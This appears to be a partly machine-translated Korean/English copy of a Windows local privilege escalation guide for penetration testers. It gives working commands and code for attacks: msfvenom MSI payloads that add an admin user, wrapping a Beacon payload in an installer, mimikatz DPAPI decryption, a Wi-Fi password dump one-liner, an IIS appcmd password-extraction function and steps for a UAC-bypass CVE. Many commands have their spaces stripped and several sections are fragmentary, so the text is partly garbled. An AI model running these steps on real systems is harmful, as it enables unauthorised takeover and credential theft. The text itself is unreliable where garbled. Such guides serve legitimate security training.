Best tool to look for Windows local privilege escalation vectors:WinPEAS
Initial Windows Theory
Access Tokens
Windows Access Tokens이 무엇인지 모른다면, 계속하기 전에 다음 페이지를 읽으세요:
ACLs - DACLs/SACLs/ACEs
ACLs - DACLs/SACLs/ACEs에 대한 더 많은 정보는 다음 페이지를 확인하세요:
Integrity Levels
Windows에서의 무결성 수준이 무엇인지 모른다면, 계속하기 전에 다음 페이지를 읽어야 합니다:
Windows Security Controls
Windows에는 시스템을 열거하는 것을 방지하거나, 실행 파일을 실행하거나 심지어 당신의 활동을 감지하는 다양한 요소가 있습니다. 권한 상승 열거를 시작하기 전에 다음 페이지를 읽고 모든 방어메커니즘을 열거해야 합니다:
System Info
Version info enumeration
Windows 버전이 알려진 취약점이 있는지 확인하세요 (적용된 패치도 확인하세요).
systeminfosysteminfo|findstr/B/C:"OS Name"/C:"OS Version"#Get only that informationwmicqfegetCaption,Description,HotFixID,InstalledOn#Patcheswmicosgetosarchitecture||echo%PROCESSOR_ARCHITECTURE%#Get system architecture
[System.Environment]::OSVersion.Version #Current OS versionGet-WmiObject-query'select * from win32_quickfixengineering'| foreach {$_.hotfixid} #List all patchesGet-Hotfix-description"Security update"#List only "Security Update" patches
Version Exploits
이 사이트는 Microsoft 보안 취약점에 대한 자세한 정보를 검색하는 데 유용합니다. 이 데이터베이스에는 4,700개 이상의 보안 취약점이 있으며, Windows 환경이 제공하는 대규모 공격 표면을 보여줍니다.
ConsoleHost_history#Find the PATH where is savedtype%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txttypeC:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txttype $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtcat (Get-PSReadlineOption).HistorySavePathcat (Get-PSReadlineOption).HistorySavePath |slspassw
#Check is enable in the registryregqueryHKCU\Software\Policies\Microsoft\Windows\PowerShell\TranscriptionregqueryHKLM\Software\Policies\Microsoft\Windows\PowerShell\TranscriptionregqueryHKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\TranscriptionregqueryHKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\TranscriptiondirC:\Transcripts#Start a Transcription sessionStart-Transcript-Path"C:\transcripts\transcript0.txt"-NoClobberStop-Transcript
PowerShell 모듈 로깅
PowerShell 파이프라인 실행의 세부 사항이 기록되며, 실행된 명령, 명령 호출 및 스크립트의 일부가 포함됩니다. 그러나 전체 실행 세부 사항 및 출력 결과는 캡처되지 않을 수 있습니다.
이를 활성화하려면 문서의 "전사 파일" 섹션의 지침을 따르고 **"모듈 로깅"**을 선택하십시오. "Powershell 전사" 대신에.
스크립트 실행의 전체 활동 및 전체 내용 기록이 캡처되어, 실행되는 모든 코드 블록이 문서화됩니다. 이 과정은 각 활동의 포괄적인 감사 추적을 보존하여 포렌식 및 악의적인 행동 분석에 유용합니다. 실행 시 모든 활동을 문서화함으로써 프로세스에 대한 자세한 통찰력을 제공합니다.
And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer is equals to 1.
Then, 악용 가능성 있음. If the last registry is equals to 0, then, the WSUS entry will be ignored.
In orther to exploit this vulnerabilities you can use tools like: Wsuxploit, pyWSUS - These are MiTM weaponized exploits scripts to inject 'fake' updates into non-SSL WSUS traffic.
Read the research here:
WSUS CVE-2020-1013
전체 보고서 읽기.
Basically, this is the flaw that this bug exploits:
If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.
Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.
You can exploit this vulnerability using the tool WSUSpicious (once it's liberated).
KrbRelayUp
A 로컬 권한 상승 vulnerability exists in Windows 도메인 environments under specific conditions. These conditions include environments where LDAP 서명이 시행되지 않음, users possess self-rights allowing them to configure Resource-Based Constrained Delegation (RBCD), and the capability for users to create computers within the domain. It is important to note that these 요구 사항 are met using 기본 설정.
msfvenom-pwindows/adduserUSER=rottenadminPASS=P@ssword123!-fmsi-nouac-oalwe.msi#No uac formatmsfvenom-pwindows/adduserUSER=rottenadminPASS=P@ssword123!-fmsi-oalwe.msi#Using the msiexec the uac wont be prompted
If you have a meterpreter session you can automate this technique using the module exploit/windows/local/always_install_elevated
PowerUP
Write-UserAddMSI 명령을 사용하여 현재 디렉토리 내에 권한 상승을 위한 Windows MSI 바이너리를 생성합니다. 이 스크립트는 사용자/그룹 추가를 요청하는 미리 컴파일된 MSI 설치 프로그램을 작성합니다(따라서 GIU 접근이 필요합니다):
Write-UserAddMSI
Just execute the created binary to escalate privileges.
MSI Wrapper
이 튜토리얼을 읽고 이 도구를 사용하여 MSI 래퍼를 만드는 방법을 배우세요. 명령줄을 실행하려는 경우 ".bat" 파일을 래핑할 수 있습니다.
Create MSI with WIX
Create MSI with Visual Studio
Cobalt Strike 또는 Metasploit를 사용하여 C:\privesc\beacon.exe에 새 Windows EXE TCP 페이로드를 생성합니다.
Visual Studio를 열고 새 프로젝트 만들기를 선택한 후 검색 상자에 "installer"를 입력합니다. Setup Wizard 프로젝트를 선택하고 Next를 클릭합니다.
프로젝트 이름을 AlwaysPrivesc로 지정하고, 위치에 **C:\privesc**를 사용하며, 솔루션과 프로젝트를 동일한 디렉토리에 배치를 선택하고 Create를 클릭합니다.
4단계 중 3단계(포함할 파일 선택)에 도달할 때까지 Next를 계속 클릭합니다. Add를 클릭하고 방금 생성한 Beacon 페이로드를 선택합니다. 그런 다음 Finish를 클릭합니다.
LAPS는 로컬 관리자 비밀번호 관리를 위해 설계되었으며, 도메인에 가입된 컴퓨터에서 각 비밀번호가 고유하고, 무작위이며, 정기적으로 업데이트되도록 보장합니다. 이러한 비밀번호는 Active Directory 내에 안전하게 저장되며, ACL을 통해 충분한 권한이 부여된 사용자만 접근할 수 있어, 권한이 있는 경우 로컬 관리자 비밀번호를 볼 수 있습니다.
Windows 8.1부터 Microsoft는 시스템을 더욱 안전하게 하기 위해 신뢰할 수 없는 프로세스가 메모리를 읽거나 코드를 주입하려는 시도를 차단하는 로컬 보안 권한(LSA)에 대한 향상된 보호 기능을 도입했습니다.
LSA 보호에 대한 자세한 정보는 여기에서 확인하세요.
도메인 자격 증명은 로컬 보안 권한(LSA)에 의해 인증되며 운영 체제 구성 요소에서 사용됩니다. 사용자의 로그인 데이터가 등록된 보안 패키지에 의해 인증되면, 일반적으로 사용자의 도메인 자격 증명이 설정됩니다.
캐시된 자격 증명에 대한 자세한 정보는 여기에서 확인하세요.
# CMDnetusers%username%#Menetusers#All local usersnetlocalgroup#GroupsnetlocalgroupAdministrators#Who is inside Administrators groupwhoami/all#Check the privileges# PSGet-WmiObject-ClassWin32_UserAccountGet-LocalUser|ftName,Enabled,LastLogonGet-ChildItemC:\Users-Force|select NameGet-LocalGroupMemberAdministrators|ftName,PrincipalSource
Privileged groups
If you 특권 그룹에 속해 있다면 권한 상승을 할 수 있습니다. 특권 그룹에 대해 배우고 이를 악용하여 권한을 상승시키는 방법은 여기에서 확인하세요:
Token manipulation
더 알아보세요토큰이 무엇인지에 대한 내용은 이 페이지에서 확인하세요: Windows Tokens.
다음 페이지를 확인하여 흥미로운 토큰에 대해 배우고 이를 악용하는 방법을 알아보세요:
Logged users / Sessions
qwinstaklistsessions
홈 폴더
dir C:\UsersGet-ChildItem C:\Users
비밀번호 정책
netaccounts
클립보드의 내용 가져오기
powershell-command"Get-Clipboard"
실행 중인 프로세스
파일 및 폴더 권한
우선, 프로세스를 나열하여 프로세스의 명령줄에 있는 비밀번호를 확인합니다.
실행 중인 일부 바이너리를 덮어쓸 수 있는지 또는 바이너리 폴더에 대한 쓰기 권한이 있는지 확인하여 가능한 DLL 하이재킹 공격을 이용합니다:
Tasklist/SVC#List processes running and servicestasklist/v/fi"username eq system"#Filter "system" processes#With allowed UsernamesGet-WmiObject-Query"Select * from Win32_Process"|where{$_.Name-notlike"svchost*"}|SelectName,Handle,@{Label="Owner";Expression={$_.GetOwner().User}} |ft-AutoSize#Without usernamesGet-Process|where{$_.ProcessName-notlike"svchost*"}|ftProcessName,Id
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (icacls"%%z"2>nul |findstr/i"(F) (M) (W) :\\"|findstr/i":\\ everyone authenticated users todos %username%"&&echo.))
Privileges can be escalated through various permissions:
SERVICE_CHANGE_CONFIG: 서비스 이진 파일의 재구성을 허용합니다.
WRITE_DAC: 권한 재구성을 가능하게 하여 서비스 구성을 변경할 수 있게 합니다.
WRITE_OWNER: 소유권 획득 및 권한 재구성을 허용합니다.
GENERIC_WRITE: 서비스 구성을 변경할 수 있는 능력을 상속받습니다.
GENERIC_ALL: 서비스 구성을 변경할 수 있는 능력을 또한 상속받습니다.
For the detection and exploitation of this vulnerability, the exploit/windows/local/service_permissions can be utilized.
Services binaries weak permissions
서비스에 의해 실행되는 이진 파일을 수정할 수 있는지 또는 이진 파일이 위치한 폴더에 대한 쓰기 권한이 있는지 확인하십시오 (DLL Hijacking).
You can get every binary that is executed by a service using wmic (not in system32) and check your permissions using icacls:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txtfor /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a"2>nul |findstr"(M) (F) :\"
You can also use sc and icacls:
scquerystate=all|findstr"SERVICE_NAME:">>C:\Temp\Servicenames.txtFOR/F"tokens=2 delims= "%iin (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txtFOR/F%iin (C:\Temp\services.txt) DO @sc qc %i |findstr"BINARY_PATH_NAME">>C:\Temp\path.txt
Services registry modify permissions
서비스 레지스트리를 수정할 수 있는지 확인해야 합니다.
서비스 레지스트리에 대한 권한을 확인하려면 다음을 수행할 수 있습니다:
regqueryhklm\System\CurrentControlSet\Services/s/vimagepath#Get the binary paths of the services#Try to write every service with its current content (to check if you have write permissions)for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul ®save%a%temp%\reg.hiv2>nul&®restore%a%temp%\reg.hiv2>nul&&echoYoucanmodify%aget-aclHKLM:\System\CurrentControlSet\services\* |Format-List*|findstr/i"<Username> Users Path Everyone"
인증된 사용자 또는 NT AUTHORITY\INTERACTIVE가 FullControl 권한을 가지고 있는지 확인해야 합니다. 그렇다면 서비스에 의해 실행되는 바이너리를 변경할 수 있습니다.
모든 인용되지 않은 서비스 경로를 나열하되, 기본 제공 Windows 서비스에 속하는 것은 제외합니다:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\"| findstr /i /v '\"'wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\"|findstr /i /v '\"'# Not only auto services# Using PowerUp.ps1Get-ServiceUnquoted-Verbose
특정 파일을 읽기 위해 일부 구성 파일을 수정할 수 있는지 또는 관리자 계정에 의해 실행될 이진 파일(예: schedtasks)을 수정할 수 있는지 확인하십시오.
시스템에서 약한 폴더/파일 권한을 찾는 방법은 다음과 같습니다:
accesschk.exe/accepteula# Find all weak folder permissions per drive.accesschk.exe-uwdqsUsersc:\accesschk.exe -uwdqs"Authenticated Users"c:\accesschk.exe -uwdqs"Everyone"c:\# Find all weak file permissions per drive.accesschk.exe-uwqsUsersc:\*.*accesschk.exe-uwqs"Authenticated Users"c:\*.*accesschk.exe-uwdqs"Everyone"c:\*.*
다른 사용자가 실행할 레지스트리나 바이너리를 덮어쓸 수 있는지 확인하십시오.다음 페이지를 읽어 권한 상승을 위한 흥미로운 autoruns 위치에 대해 더 알아보십시오:
드라이버
가능한 서드파티 이상한/취약한 드라이버를 찾아보십시오.
driverquerydriverquery.exe/fotabledriverquery/SI
PATH DLL Hijacking
만약 PATH에 있는 폴더 내에서 쓰기 권한이 있다면 프로세스에 의해 로드된 DLL을 하이재킹하고 권한을 상승시킬 수 있습니다.
PATH 내 모든 폴더의 권한을 확인하세요:
for %%A in ("%path:;=";"%") do ( cmd.exe/cicacls"%%~A"2>nul|findstr/i"(F) (M) (W) :\" | findstr /i ":\\ everyoneauthenticateduserstodos%username%" && echo. )
더 많은 정보는 이 체크를 악용하는 방법에 대해:
네트워크
공유
netview#Get a list of computersnetview/all/domain [domainname] #Shares on the domainsnetview \\computer/ALL#List shares of a computernetusex: \\computer\share#Mount the share locallynetshare#Check current shares
hosts file
hosts 파일에 하드코딩된 다른 알려진 컴퓨터가 있는지 확인하십시오.
type C:\Windows\System32\drivers\etc\hosts
네트워크 인터페이스 및 DNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Open Ports
외부에서 제한된 서비스를 확인하십시오.
netstat-ano#Opened ports?
라우팅 테이블
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP 테이블
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
Windows 금고는 Windows가 사용자를 자동으로 로그인할 수 있는 자격 증명을 저장합니다. 이는 자원에 접근하기 위해 자격 증명이 필요한 모든 Windows 애플리케이션이 이 자격 증명 관리자 및 Windows 금고를 사용하여 사용자가 항상 사용자 이름과 비밀번호를 입력하는 대신 제공된 자격 증명을 사용할 수 있음을 의미합니다.
애플리케이션이 자격 증명 관리자와 상호 작용하지 않는 한, 특정 자원에 대한 자격 증명을 사용하는 것은 불가능하다고 생각합니다. 따라서 애플리케이션이 금고를 사용하려면 자격 증명 관리자와 통신하여 해당 자원에 대한 자격 증명을 기본 저장 금고에서 요청해야 합니다.
**데이터 보호 API (DPAPI)**는 데이터의 대칭 암호화를 위한 방법을 제공하며, 주로 Windows 운영 체제 내에서 비대칭 개인 키의 대칭 암호화에 사용됩니다. 이 암호화는 사용자 또는 시스템 비밀을 활용하여 엔트로피에 크게 기여합니다.
DPAPI는 사용자의 로그인 비밀에서 파생된 대칭 키를 통해 키의 암호화를 가능하게 합니다. 시스템 암호화가 포함된 시나리오에서는 시스템의 도메인 인증 비밀을 사용합니다.
DPAPI를 사용하여 암호화된 사용자 RSA 키는 %APPDATA%\Microsoft\Protect\{SID} 디렉토리에 저장되며, 여기서 {SID}는 사용자의 보안 식별자를 나타냅니다. DPAPI 키는 사용자의 개인 키를 보호하는 마스터 키와 동일한 파일에 위치하며, 일반적으로 64바이트의 임의 데이터로 구성됩니다. (이 디렉토리에 대한 접근은 제한되어 있어 CMD의 dir 명령어로 내용을 나열할 수 없지만, PowerShell을 통해 나열할 수 있습니다).
You can use mimikatz moduledpapi::masterkey with the appropriate arguments (/pvk or /rpc) to decrypt it.
The credentials files protected by the master password are usually located in:
마스터 비밀번호로 보호된 자격 증명 파일은 일반적으로 다음 위치에 있습니다:
dir C:\Users\username\AppData\Local\Microsoft\Credentials\dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\Get-ChildItem-Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\Get-ChildItem-Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
You can use mimikatz moduledpapi::cred with the appropiate /masterkey to decrypt.
You can extract many DPAPImasterkeys from memory with the sekurlsa::dpapi module (if you are root).
PowerShell Credentials
PowerShell 자격 증명은 종종 스크립팅 및 자동화 작업을 위해 암호화된 자격 증명을 편리하게 저장하는 방법으로 사용됩니다. 자격 증명은 DPAPI를 사용하여 보호되며, 일반적으로 이는 생성된 동일한 컴퓨터의 동일한 사용자만 복호화할 수 있음을 의미합니다.
To decrypt a PS credentials from the file containing it you can do:
#List saved Wifi usingnetshwlanshowprofile#To get the clear-text password usenetshwlanshowprofile<SSID>key=clear#Oneliner to extract all wifi passwordscls&echo.&for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netshwlanshowprofilesname="%b"key=clear|findstr"SSID Cipher Content"|find/v"Number"&echo.) &@echoon*
저장된 RDP 연결
HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
와 HKCU\Software\Microsoft\Terminal Server Client\Servers\에서 찾을 수 있습니다.
Use the Mimikatzdpapi::rdg 모듈과 적절한 /masterkey를 사용하여 모든 .rdg 파일을 복호화합니다.
여러 DPAPI 마스터 키를 메모리에서 Mimikatz sekurlsa::dpapi 모듈로 추출할 수 있습니다.
Sticky Notes
사람들은 종종 Windows 워크스테이션에서 StickyNotes 앱을 사용하여 비밀번호 및 기타 정보를 저장하지만, 이것이 데이터베이스 파일이라는 것을 인식하지 못합니다. 이 파일은 C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite에 위치하며 항상 검색하고 검토할 가치가 있습니다.
AppCmd.exe
AppCmd.exe에서 비밀번호를 복구하려면 관리자여야 하며 높은 무결성 수준에서 실행해야 합니다.AppCmd.exe는 %systemroot%\system32\inetsrv\ 디렉토리에 위치합니다.
이 파일이 존재하면 일부 자격 증명이 구성되었을 가능성이 있으며 복구할 수 있습니다.
functionGet-ApplicationHost {$OrigError = $ErrorActionPreference$ErrorActionPreference = "SilentlyContinue"# Check if appcmd.exe existsif (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {# Create data table to house results$DataTable = New-Object System.Data.DataTable# Create and name columns in the data table$Null = $DataTable.Columns.Add("user")$Null = $DataTable.Columns.Add("pass")$Null = $DataTable.Columns.Add("type")$Null = $DataTable.Columns.Add("vdir")$Null = $DataTable.Columns.Add("apppool")# Get list of application poolsInvoke-Expression"$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name"|ForEach-Object{# Get application pool name$PoolName = $_# Get username$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"$PoolUser = Invoke-Expression $PoolUserCmd# Get password$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"$PoolPassword = Invoke-Expression $PoolPasswordCmd# Check if credentials existsif (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {# Add credentials to database$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)}}# Get list of virtual directoriesInvoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" |ForEach-Object{# Get Virtual Directory Name$VdirName = $_# Get username$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"$VdirUser = Invoke-Expression $VdirUserCmd# Get password$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"$VdirPassword = Invoke-Expression $VdirPasswordCmd# Check if credentials existsif (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {# Add credentials to database$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')}}# Check if any passwords were foundif( $DataTable.rows.Count-gt0 ) {# Display results in list view that can feed into the pipeline$DataTable |Sort-Objecttype,user,pass,vdir,apppool|Select-Objectuser,pass,type,vdir,apppool-Unique}else {# Status userWrite-Verbose 'No application pool or virtual directory passwords were found.'$False}}else {Write-Verbose 'Appcmd.exe does not exist in the default location.'$False}$ErrorActionPreference = $OrigError}
SCClient / SCCM
C:\Windows\CCM\SCClient.exe가 존재하는지 확인하십시오.
설치 프로그램은 SYSTEM 권한으로 실행되며, 많은 프로그램이 DLL Sideloading에 취약합니다 (정보 출처: ** https://github.com/enjoiz/Privesc).**
regquery"HKCU\Software\SimonTatham\PuTTY\Sessions"/s|findstr"HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername"#Check the values saved in each session, user/password could be there
이 기술은 더 이상 유효하지 않은 것 같습니다. 나는 몇 개의 ssh 키를 생성하고 ssh-add로 추가한 후 ssh를 통해 머신에 로그인하려고 했습니다. 레지스트리 HKCU\Software\OpenSSH\Agent\Keys가 존재하지 않으며 procmon은 비대칭 키 인증 중에 dpapi.dll의 사용을 식별하지 못했습니다.
# Usually %SYSTEMROOT% = C:\Windows%SYSTEMROOT%\repair\SAM%SYSTEMROOT%\System32\config\RegBack\SAM%SYSTEMROOT%\System32\config\SAM%SYSTEMROOT%\repair\system%SYSTEMROOT%\System32\config\SYSTEM%SYSTEMROOT%\System32\config\RegBack\system
클라우드 자격 증명
#From user home.aws\credentialsAppData\Roaming\gcloud\credentials.dbAppData\Roaming\gcloud\legacy_credentialsAppData\Roaming\gcloud\access_tokens.db.azure\accessTokens.json.azure\azureProfile.json
McAfee SiteList.xml
SiteList.xml라는 파일을 검색하세요.
Cached GPP Pasword
이전에는 Group Policy Preferences (GPP)를 통해 여러 머신에 사용자 지정 로컬 관리자 계정을 배포할 수 있는 기능이 제공되었습니다. 그러나 이 방법에는 심각한 보안 결함이 있었습니다. 첫째, SYSVOL에 XML 파일로 저장된 Group Policy Objects (GPOs)는 모든 도메인 사용자가 접근할 수 있었습니다. 둘째, 공개적으로 문서화된 기본 키를 사용하여 AES256으로 암호화된 이러한 GPP 내의 비밀번호는 인증된 사용자가 복호화할 수 있었습니다. 이는 사용자가 권한 상승을 얻을 수 있는 심각한 위험을 초래했습니다.
이 위험을 완화하기 위해, 비어 있지 않은 "cpassword" 필드를 포함하는 로컬 캐시 GPP 파일을 스캔하는 기능이 개발되었습니다. 이러한 파일을 찾으면, 해당 기능은 비밀번호를 복호화하고 사용자 지정 PowerShell 객체를 반환합니다. 이 객체에는 GPP에 대한 세부정보와 파일의 위치가 포함되어 있어 이 보안 취약점을 식별하고 수정하는 데 도움이 됩니다.
C:\ProgramData\Microsoft\Group Policy\history 또는 _C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (W Vista 이전)**에서 이러한 파일을 검색하세요:
Groups.xml
Services.xml
Scheduledtasks.xml
DataSources.xml
Printers.xml
Drives.xml
cPassword를 복호화하려면:
#To decrypt these passwords you can decrypt it usinggpp-decryptj1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Using crackmapexec to get the passwords:
비밀번호를 얻기 위해 crackmapexec 사용:
You can always ask the user to enter his credentials of even the credentials of a different user if you think he can know them (notice that asking the client directly for the credentials is really risky):
**컴포넌트 오브젝트 모델 (COM)**은 서로 다른 언어의 소프트웨어 구성 요소 간의 상호 통신을 허용하는 Windows 운영 체제 내에 구축된 기술입니다. 각 COM 구성 요소는 **클래스 ID (CLSID)**를 통해 식별되며, 각 구성 요소는 인터페이스 ID (IIDs)를 통해 식별되는 하나 이상의 인터페이스를 통해 기능을 노출합니다.
COM 클래스와 인터페이스는 각각 HKEY_CLASSES_ROOT\CLSID 및 HKEY_CLASSES_ROOT\Interface 레지스트리에 정의됩니다. 이 레지스트리는 HKEY_LOCAL_MACHINE\Software\Classes + HKEY_CURRENT_USER\Software\Classes = HKEY_CLASSES_ROOT를 병합하여 생성됩니다.
이 레지스트리의 CLSID 내부에는 DLL을 가리키는 기본값과 ThreadingModel이라는 값을 포함하는 자식 레지스트리 InProcServer32가 있습니다. 이 값은 Apartment (단일 스레드), Free (다중 스레드), Both (단일 또는 다중) 또는 Neutral (스레드 중립)일 수 있습니다.
기본적으로, 실행될 DLL 중 하나를 덮어쓸 수 있다면, 해당 DLL이 다른 사용자에 의해 실행될 경우 권한 상승을 할 수 있습니다.
공격자가 COM 하이재킹을 지속성 메커니즘으로 사용하는 방법을 배우려면 다음을 확인하십시오:
MSF-Credentials Plugin는 msf 플러그인으로, 이 플러그인은 희생자의 내부에서 자격 증명을 검색하는 모든 metasploit POST 모듈을 자동으로 실행하기 위해 생성되었습니다.Winpeas 는 이 페이지에 언급된 비밀번호가 포함된 모든 파일을 자동으로 검색합니다.
Lazagne 은 시스템에서 비밀번호를 추출하는 또 다른 훌륭한 도구입니다.
도구 SessionGopher 는 세션, 사용자 이름 및 비밀번호를 검색하며, 여러 도구가 이 데이터를 일반 텍스트로 저장합니다 (PuTTY, WinSCP, FileZilla, SuperPuTTY, 및 RDP)
공유 메모리 세그먼트, 즉 파이프는 프로세스 간의 통신 및 데이터 전송을 가능하게 합니다.
Windows는 Named Pipes라는 기능을 제공하여 관련 없는 프로세스가 서로 다른 네트워크를 통해서도 데이터를 공유할 수 있게 합니다. 이는 클라이언트/서버 아키텍처와 유사하며, 역할은 named pipe server와 named pipe client로 정의됩니다.
데이터가 클라이언트에 의해 파이프를 통해 전송될 때, 파이프를 설정한 서버는 필요한 SeImpersonate 권한이 있는 경우 클라이언트의 신원을 취할 수 있는 능력을 가집니다. 파이프를 통해 통신하는 특권 프로세스를 식별하고 이를 모방할 수 있는 기회를 제공하여, 해당 프로세스가 당신이 설정한 파이프와 상호작용할 때 그 프로세스의 신원을 채택함으로써 더 높은 권한을 얻을 수 있습니다. 이러한 공격을 실행하는 방법에 대한 지침은 여기와 여기에서 찾을 수 있습니다.
낮은 권한 사용자에서 NT\AUTHORITY SYSTEM으로 (CVE-2019-1388) / UAC 우회
그래픽 인터페이스(콘솔 또는 RDP를 통해)에 접근할 수 있고 UAC가 활성화된 경우, 일부 버전의 Microsoft Windows에서는 비권한 사용자로부터 "NT\AUTHORITY SYSTEM"과 같은 터미널이나 다른 프로세스를 실행할 수 있습니다.
이로 인해 권한 상승과 UAC 우회를 동시에 동일한 취약점을 통해 수행할 수 있습니다. 또한, 아무것도 설치할 필요가 없으며, 프로세스 중에 사용되는 바이너리는 Microsoft에 의해 서명되고 발급됩니다.
영향을 받는 시스템은 다음과 같습니다:
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
이 취약점을 악용하기 위해서는 다음 단계를 수행해야 합니다:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
You have all the necessary files and information in the following GitHub repository:
https://github.com/jas502n/CVE-2019-1388
관리자 중간에서 높은 무결성 수준으로 / UAC 우회
무결성 수준에 대해 배우려면 이 내용을 읽으세요:
그런 다음 UAC 및 UAC 우회에 대해 배우려면 이 내용을 읽으세요:
높은 무결성에서 시스템으로
새 서비스
이미 높은 무결성 프로세스에서 실행 중이라면, SYSTEM으로의 전환은 새 서비스를 생성하고 실행하는 것으로 쉽게 할 수 있습니다:
이러한 토큰 권한이 있는 경우(아마도 이미 High Integrity 프로세스에서 찾을 수 있을 것입니다), 거의 모든 프로세스(보호되지 않은 프로세스)를 SeDebug 권한으로 열고, 프로세스의 토큰을 복사하여 해당 토큰으로 임의의 프로세스를 생성할 수 있습니다.
이 기술을 사용할 때는 일반적으로 모든 토큰 권한을 가진 SYSTEM으로 실행 중인 프로세스를 선택합니다(예, 모든 토큰 권한이 없는 SYSTEM 프로세스를 찾을 수 있습니다).
제안된 기술을 실행하는 코드의예제를 여기에서 찾을 수 있습니다.
Named Pipes
이 기술은 meterpreter가 getsystem에서 상승하는 데 사용됩니다. 이 기술은 파이프를 생성한 다음 해당 파이프에 쓰기 위해 서비스를 생성/악용하는 것으로 구성됩니다. 그런 다음, SeImpersonate 권한을 사용하여 파이프를 생성한 서버는 파이프 클라이언트(서비스)의 토큰을 가장할 수 있어 SYSTEM 권한을 얻습니다.
이름 파이프에 대해 더 알고 싶다면 이 글을 읽어야 합니다.
이름 파이프를 사용하여 High Integrity에서 System으로 가는 방법에 대한 예제를 읽고 싶다면 이 글을 읽어야 합니다.
Dll Hijacking
SYSTEM으로 실행 중인 프로세스에 의해 로드되는 dll을 하이재킹하는 데 성공하면 해당 권한으로 임의의 코드를 실행할 수 있습니다. 따라서 Dll Hijacking은 이러한 종류의 권한 상승에도 유용하며, 게다가 High Integrity 프로세스에서 훨씬 더 쉽게 달성할 수 있습니다. 이는 dll을 로드하는 데 사용되는 폴더에 쓰기 권한을 가지기 때문입니다.
Dll 하이재킹에 대해더 알고 싶다면 여기에서 확인하세요.
Watson -- 알려진 privesc 취약점 검색 (VisualStudio를 사용하여 컴파일해야 함) (미리 컴파일된)
